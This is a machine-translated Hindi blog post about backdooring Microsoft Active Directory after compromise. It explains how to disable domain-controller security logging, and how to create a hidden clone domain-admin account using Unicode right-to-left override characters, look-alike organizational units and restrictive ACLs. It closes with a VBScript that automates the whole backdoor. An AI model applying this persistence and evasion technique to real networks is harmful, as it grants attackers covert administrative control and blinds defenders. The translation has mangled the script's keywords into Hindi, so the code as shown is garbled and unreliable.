👨🏻‍⚕️ 🎠 🌆 सक्रिय निर्देशिका में पिछले दरवाजे # 2 🚟 🧑🏿‍🤝‍🧑🏿 👩‍🔬

पिछले साल की शुरुआत में, मैंने पहले ही Microsoft सक्रिय निर्देशिका डोमेन में शोषण के बाद के विषय को उठाया था। पहले प्रस्तावित दृष्टिकोण में, एक विकल्प पर विचार किया गया था कि उनके प्रत्यक्ष उपयोग की तुलना में प्रशासनिक विशेषाधिकारों की हानि के मामले पर अधिक ध्यान केंद्रित किया गया था। इसी समय, इन विशेषाधिकारों को वापस करने का बहुत कार्य "शोर" घटनाओं और कैटलॉग में नेत्रहीन फेन जोड़तोड़ को निहित करता है। दूसरे शब्दों में, किसी डोमेन में प्रशासनिक विशेषाधिकारों को पुनः प्राप्त करने के लिए, संबंधित सुरक्षा समूह का सदस्य बनना आवश्यक था, उदाहरण के लिए, डोमेन एडमिंस समूह।

मुझे कहना होगा कि प्रशासक बहुत चिंतित हैं जब उन्हें अचानक अपने सिस्टम में किसी और की उपस्थिति का एहसास होता है। उनमें से कुछ अपने सभी लोगों के साथ सुरक्षा घटना को संभालने के लिए भागते हैं। कभी-कभी, सबसे अप्रत्याशित कार्रवाई;))

अब कल्पना करें कि किसी बड़ी कंपनी में एक सक्रिय निर्देशिका प्रशासक कैसे व्यवहार कर सकता है जब वह एंटरप्राइज़ एडमिंस सुरक्षा समूह में किसी अपरिचित पहचानकर्ता को देखता है? यदि कोई परेशान नहीं है, तो प्रशासक की चिंता पूरी तरह से उचित है। लेकिन पेन्टेस्ट के दौरान अपर्याप्त विरोध के मामले में, किसी को वास्तव में बहुत ज्यादा चिंता नहीं करनी चाहिए (वास्तव में पसीने और रक्त से प्राप्त प्रवेश बिंदु और विशेषाधिकारों से वंचित लोगों को कैसे करना चाहिए)।

मैंने लंबे समय तक इस बात पर विचार किया कि कैसे, प्रशासकों को डराए बिना, पैठ परीक्षण के दौरान प्राप्त विशेषाधिकारों का स्वतंत्र रूप से उपयोग करने के लिए (विशेष रूप से हाल के कार्यों में प्रशासकों के आक्रामक विरोध की पृष्ठभूमि के खिलाफ)। एक ओर, जब एक कीट का संचालन करते हैं, तो हम क्षमताओं में बहुत सीमित हैं। उदाहरण के लिए, अध्ययन की वस्तु पर प्रभाव को कम करने का नियम प्रदान किया गया है। इसलिए, हम बस कैप्चर किए गए नेटवर्क पर बैक-स्पॉन और स्कैटर को बिखेर नहीं सकते। दूसरी ओर, पूरी तरह से समझने योग्य लक्ष्य हैं जो आपको उस क्षण तक पहुंचने की आवश्यकता है जब हर्षित व्यवस्थापक अनधिकृत गतिविधि देखता है और आउटलेट से कॉर्ड खींचता है।

तो आप Microsoft नेटवर्क पर किसी का ध्यान कैसे नहीं जा सकते हैं?

पहली बात जो मन में आती है वह है व्यवस्थापक खाते का उपयोग करना। पहुंच वैध है, इसलिए इसे विशेष ध्यान आकर्षित नहीं करना चाहिए। लेकिन, जैसा कि अभ्यास से पता चलता है, व्यवस्थापक पासवर्ड को स्पष्ट रूप से प्राप्त करना हमेशा संभव नहीं होता है। इन मामलों में, पास-ए-हश के रूप में जाना जाने वाला हमला बचाव के लिए जाता है। यह लगभग सभी अद्भुत होगा (लगभग क्योंकि पास-ए-हैश हमले को विकसित करने की संभावनाओं को बताता है, उदाहरण के लिए, आप आरडीपी रिमोट कंट्रोल प्रोटोकॉल का उपयोग नहीं कर सकते हैं), लेकिन गंभीर कंपनियों में, प्रशासक धीरे-धीरे स्मार्ट कार्ड पर स्विच कर रहे हैं, जो हमलों के आधार पर अनुमति नहीं देता है एनटीएलएम प्रोटोकॉल की खामियों पर। अच्छा है, लेकिन अभी भी एक अधिकृत उपयोगकर्ता टोकन (eq incognito ) और / या Kerberos टिकट (eq WCE ) का उपयोग करने की संभावना है। यह निश्चित रूप से सच है, लेकिन व्यवहार में केर्बरोस केरबरोस नहीं है और टोकन एक टोकन नहीं है :( इस प्रकार के हमलों को करने के लिए उपलब्ध उपकरण, दुर्भाग्य से, खुले तौर पर बकवास है। इसके अलावा, दोनों मामलों में, बिल्कुल पास-द-हैश हमले के साथ की तरह। डोमेन में SSO का समर्थन करने वाले प्रोटोकॉल द्वारा हमलावर की क्रियाएं बहुत सीमित हैं।

इस प्रकार, सबसे आकर्षक तरीका विशेषाधिकारों का उपयोग करना है, यदि पहले से मौजूद नहीं है, तो एक ज्ञात पासवर्ड के साथ एक डोमेन व्यवस्थापक पहचानकर्ता बनाया ...

डोमेन व्यवस्थापक की सतर्क नज़र में कैसे न दौड़ें?

सबसे पहले, सक्रिय निर्देशिका में परिवर्तन करने से संबंधित घटनाओं को ट्रिगर किया जाता है जो प्रशासक से बेहतर होता है, जिनके बारे में पता नहीं है। इसलिए, डोमेन पर अपलोड करने से पहले (ज़ाहिर है, केवल प्रवेश परीक्षण आयोजित करते समय और ग्राहक पक्ष के जिम्मेदार व्यक्ति के साथ इस क्रिया पर सहमत होने के बाद), उचित GPO के माध्यम से डोमेन नियंत्रकों पर सुरक्षा घटनाओं के लॉगिंग को अक्षम करने की सिफारिश की जाती है। मुझे आपको याद दिलाना है कि डिफ़ॉल्ट रूप से डोमेन नियंत्रकों के लिए समूह नीतियों के लिए पृष्ठभूमि अद्यतन समय 15 मिनट है।

दूसरे, मौजूदा डोमेन व्यवस्थापक के समान एक समान रूप से एक समान खाता बनाने के लिए कोई भी परेशान नहीं करता है। इसके लिए, उदाहरण के लिए, यूनिकोड वर्ण (!) का उपयोग किया जा सकता है। अगला, बनाया गया उपयोगकर्ता "TRUE" मूल्य में "showInAdvancedViewOnly" विशेषता पर सेट है, जो ऑब्जेक्ट को "उपयोगकर्ता और कंप्यूटर प्रबंधन" स्नैप-इन (dsa.msc) के मानक देखने के मोड में छिपा देगा। उसके बाद, यह इस उपयोगकर्ता को वास्तविक डोमेन व्यवस्थापक (लगभग) से मुक्त प्रशासनिक समूहों में से एक में रखने के लिए बना हुआ है। एक नियम के रूप में, प्रशासक अपने खाते को सभी बोधगम्य और बोधगम्य प्रशासनिक समूहों में छड़ी करना पसंद करते हैं; उदाहरण के लिए, हम व्यवस्थापक को एंटरप्राइज़ एडमिन ग्रुप में छोड़ देंगे; , और समूह "डोमेन एडमिंस") में क्लोन डाल दिया।

लेकिन मुझे लगता है कि कई पाठकों ने पहले ही कंपनी की सफलता पर संदेह किया है। और वे सही हैं! यह विधि अच्छी नहीं है, क्योंकि इसकी दो महत्वपूर्ण कमियां हैं:
1. बनाया उपयोगकर्ता पहचानकर्ता "सशस्त्र आंख" निर्देशिका में दिखाई देता है।
2. जब किसी डोमेन में उपयोगकर्ताओं को खोजते हैं, तो व्यवस्थापक खाता दोगुना होना शुरू हो जाता है।

इन समस्याओं को कैसे हल करें?

ऐसा लगता है कि सतह पर सबसे सरल समाधान निर्मित वस्तु (हमारे उपयोगकर्ता) तक पहुंच अधिकारों को सही ढंग से कॉन्फ़िगर करना है। ऐसा करने के लिए, सभी को समूह से ऑब्जेक्ट के लिए सार्वजनिक जानकारी पढ़ने पर रोक लगाना पर्याप्त है। और असली सक्रिय निर्देशिका व्यवस्थापक के बगल में संगठनात्मक इकाई में, "कुछ" लटकाएगा जो कि डोमेन में उपयोगकर्ताओं की खोज करते समय कम से कम बंद हो जाएगा। हालाँकि, कहानी 60 मिनट से अधिक नहीं चलेगी :( तथ्य यह है कि, डिफ़ॉल्ट रूप से, डोमेन नियंत्रक पर हर 60 मिनट में जो PDC एमुलेटर के रूप में कार्य करता है, SDPROP प्रक्रिया शुरू की जाती है, जो कई सक्रिय निर्देशिका ऑब्जेक्ट के लिए एक्सेस अधिकारों को पुनर्स्थापित करती है (सहित) व्यवस्थापक समूह के सभी सदस्य) AdminSDHolder ऑब्जेक्ट ( http://technet.microsoft.com/en-us/query/ee361593 ) पर स्थापित एक्सेस अधिकारों के अनुसार।

दुर्भाग्य से, नियमित क्षमताओं के साथ निर्दिष्ट सुरक्षा तंत्र को अक्षम करना असंभव है। किसी ऑब्जेक्ट के एक्सेस अधिकारों के साथ हैक करने से प्रतिकृति के साथ समस्याएं हो सकती हैं (और यहां पहले से ही किसी प्रकार की तोड़फोड़ की तरह बदबू आ रही है; जब नीचे की ओर गिरती है)। "AdminSDHolder" पर ओवरराइटिंग की अनुमति सभी डोमेन प्रशासकों के पहचानकर्ताओं सहित कई वस्तुओं को प्रभावित करेगी। इस प्रकार, संभव उपयोगी समाधानों में से एक स्क्रिप्ट को नियमित रूप से चलाना हो सकता है, जो "SDPROP" प्रक्रिया की त्रुटियों को सही करेगा, लेकिन एक अधिक आशाजनक विकल्प भी है।

SDPROP प्रक्रिया केवल विशिष्ट विशेषाधिकार प्राप्त वस्तुओं तक पहुँच अधिकार (ACE) को पुनर्स्थापित करती है, जबकि संगठनात्मक इकाइयों के लिए पहुँच अधिकार जिसमें ऐसी वस्तुएँ अपरिवर्तित रहती हैं। यह सिर्फ तुम क्या उपयोग कर सकते है! आखिरकार, कोई भी हमें परेशान नहीं करता है, यूनिकोड वर्णों का उपयोग करके, संगठनात्मक इकाइयों के समान अनुक्रम बनाने के लिए, उस अनुक्रम के समान जिसमें क्लोन पहचानकर्ता निहित है। एक ही समय में, बेहतर कंटेनर के लिए "सही" एक्सेस अधिकार इसे prying आँखों (निश्चित रूप से, कारण के भीतर) से नेत्रहीन छिपाने की अनुमति देगा।

इस दृष्टिकोण का अर्थ यह है कि सक्रिय निर्देशिका व्यवस्थापक को इस तथ्य के बारे में अस्वास्थ्यकर संदेह नहीं होना चाहिए कि उसे सौंपी गई प्रणाली से समझौता किया गया है। वह वर्तमान प्रशासक बने हुए हैं, सिवाय इसके कि विशेषाधिकार प्राप्त समूहों में से एक का एक सदस्य एक नेत्रहीन समान खाता है ...

और आखिरी वाला। कैटलॉग खोज में डुप्लिकेट नहीं किए जाने के लिए बनाए गए क्लोन के लिए, आप उपयोग कर सकते हैं, उदाहरण के लिए, " 202E " प्रतीक (अनुस्मारक के लिए अलेक्जेंडर जैतसेव का सम्मान)। निर्दिष्ट वर्ण इसके पीछे की रेखा को फ़्लिप करता है। इस प्रकार, यदि, उदाहरण के लिए, हम पहचानकर्ता "dmitry.ivanov" के लिए एक क्लोन बनाते हैं, तो बनाया गया पहचानकर्ता "202E" + "vonavi.yrtimd" फॉर्म का होगा। शायद यह दृष्टिकोण प्रमाणीकरण के लिए इतना सुविधाजनक नहीं है, लेकिन यह आपको निर्देशिका खोज में जाने से बचाता है।

सुरक्षा लॉग के दृष्टिकोण से, यह दृष्टिकोण आपको एक निश्चित बिंदु तक किसी का ध्यान नहीं जाने देता है।

नीचे एक स्क्रिप्ट है जो उपरोक्त सभी को स्वचालित करता है। विन्यास विकल्प:

strAdminsamAccountName - पहचानकर्ता के साथ क्लोन करने के लिए
strAdminsGroup - क्लोन रखने के लिए विशेषाधिकार प्राप्त समूह
strPassNewUser - नए उपयोगकर्ता के लिए पासवर्ड सेट करें

त्रुटि फिर से शुरू पर

strAdminsamAccountName = "dmitry.ivanov"
strAdminsGroup = "डोमेन व्यवस्थापक"
strPassNewUser = "P @ ssw0rd"

'- - - मंद arrContainer (), i

ObjRootDSE = GetObject ("LDAP: // RootDSE") सेट करें
strDomain = objRootDSE.Get ("DefaultNamingContext")
सेट करें objDomain = GetObject ("LDAP: //" और strDomain)

strAdminsamAccountNameDN = SearchDN ("'WHERE वस्तु श्रेणी =' उपयोगकर्ता 'और samAccountName ='" और strAdminsamAccountName & "" ")

यदि इस्नल नहीं है (strAdminsamAccountNameDN) तब

ObjAdmin = GetObject ("LDAP: //" और strAdminsamAccountNameDN सेट करें)
ObjOU सेट करें = GetObject (objAdmin.parent)

मैं = ०
EnumOUs (objOU) को बुलाओ

J = i-1 के लिए 0 चरण -1

if strContainer = "" तब
strContainer = "OU =" और arrContainer (j) और strContainer
PrimaryContainer = strContainer
अन्यथा
strContainer = "OU =" और arrContainer (j) & "," और strContainer
यदि समाप्त हो
ObjOUcreate = objDomain.Create ("संगठनात्मक उपयोग", strContainer) सेट करें
objOUcreate.SetInfo
अगला

ObjContainer सेट करें = GetObject ("LDAP: //" और strContainer & "," & strDomain)

सेट करें objUserCreate = objContainer.Create ("उपयोगकर्ता", "cn =" और ChrW (8238) और StrReverse (objAdmin.displayName))
objUserCreate.Put "sAMAccountName", ChrW (8238) और StrReverse (strAdminsamAccountName)
objUserCreate.SetInfo
त्रुटि फिर से शुरू पर

objUserCreate.SetPassword strPassNewUser
objUserCreate.Put "userAccountControl", 66048
objUserCreate.Put "दिया गया", ChrW (8238) और StrReverse (objAdmin.givenName)
objUserCreate.Put "sn", ChrW (8238) और StrReverse (objAdmin.sn)
objUserCreate.Put "आद्याक्षर", ChrW (8238) और StrReverse (objAdmin.initials)
objUserCreate.SetInfo
त्रुटि फिर से शुरू पर

objUserCreate.Put "showInAdvancedViewOnly", "TRUE"
objUserCreate.SetInfo
त्रुटि फिर से शुरू पर

NewUserDN = "cn =" और ChrW (8238) और StrReverse (objAdmin.displayName) और "," और objContainer.distinguishedName

strAdminsGroupDN = SearchDN ("'WHERE वस्तु श्रेणी =' समूह 'और samAccountName ='" और strAdminsGroup और "" ")

यदि IsNull (strAdminsGroupDN) नहीं है
ObjGroup = GetObject ("LDAP: //" और strAdminsGroupDN) सेट करें
objGroup.PutEx 4, "सदस्य", ऐरे (strAdminsamAccountNameDN)
objGroup.SetInfo
objGroup.PutEx 3, "सदस्य", ऐरे (NewUserDN)
objGroup.SetInfo
यदि समाप्त हो

OUAddAce (प्रायोरेंटेनर एंड "," और स्ट्रोमैन)

यदि समाप्त हो

फंक्शन SearchDN (str)
सेट करें objConnection = CreateObject ("ADODB.Connection")

objConnection.Provider = "ADsDSOObject"
objConnection.Open "सक्रिय निर्देशिका प्रदाता"

ObjCommand = CreateObject ("ADODB.Command") सेट करें
सेट objCommand.ActiveConnection = objConnection
objCommand.Properties ("सर्चस्कोप") = 2

objCommand.CommandText = "LDAP से विशिष्ट नाम चुनें: //" और strDomain & str
ObjRecordSet = objCommand.Execute सेट करें
यदि objRecordSet.EOF तब नहीं
SearchDN = objRecordSet.Fields ("प्रतिष्ठित नाम")। मान
यदि समाप्त हो
अंत समारोह

उप EnumOUs (objChild)
मंद आक्षेप

ObjParent सेट करें = GetObject (objChild.Parent)
यदि (objParent.Class = "संगठनात्मक उपयोग") तो
ReDim संरक्षक को सुरक्षित करें (i + 1)
arrContainer (i) = objChild.ou
i = i + 1
EnumOUs (objParent) को कॉल करें
अन्यथा
ReDim संरक्षक को सुरक्षित करें (i + 1)
arrContainer (i) = objChild.ou और ChrW (128)
i = i + 1
यदि समाप्त हो
अंत उप

समारोह OUAddAce (OU)

मंद objSdUtil, objSD, objDACL, objAce
ObjOU सेट करें = GetObject ("LDAP: //" और OU)

ObjSdUtil = GetObject (objOU.ADsPath) सेट करें
ObjSD = objSdUtil.Get ("ntSecurityDescriptor") सेट करें
ObjDACL = objSD.DiscretionaryACL सेट करें
सेट करें objAce = CreateObject ("AccessControlEntry")

objAce.Trustee = "हर कोई"
objAce.AceFlags = 2
objAce.AceType = 6
objAce.AccessMask = 16
objAce.Flags = 1
objAce.ObjectType = "{E48D0154-BCF8-11D1-8702-00C04FB96050}"
objDacl.AddAce objAce

objSD.DiscretionaryAcl = objDacl
objDUtil.Put "ntSecurityDescriptor", Array (objSD)
objSDUtil.SetInfo

ObjNtSecurityDescriptor = objOU.Get ("ntSecurityDescriptor") सेट करें
intNtSecurityDescriptorControl = objNtSecurityDescriptor.Control
intNtSecurityDescriptorControl = intNtSecurityDescriptorControl Xor & H1000
objNtSecurityDescriptor.Control = intNtSecurityDescriptorControl
objOU.Put "ntSecurityDescriptor", objNtSecurityDescriptor
objOU.SetInfo

अंत समारोह

सक्रिय निर्देशिका में पिछले दरवाजे # 2

More articles: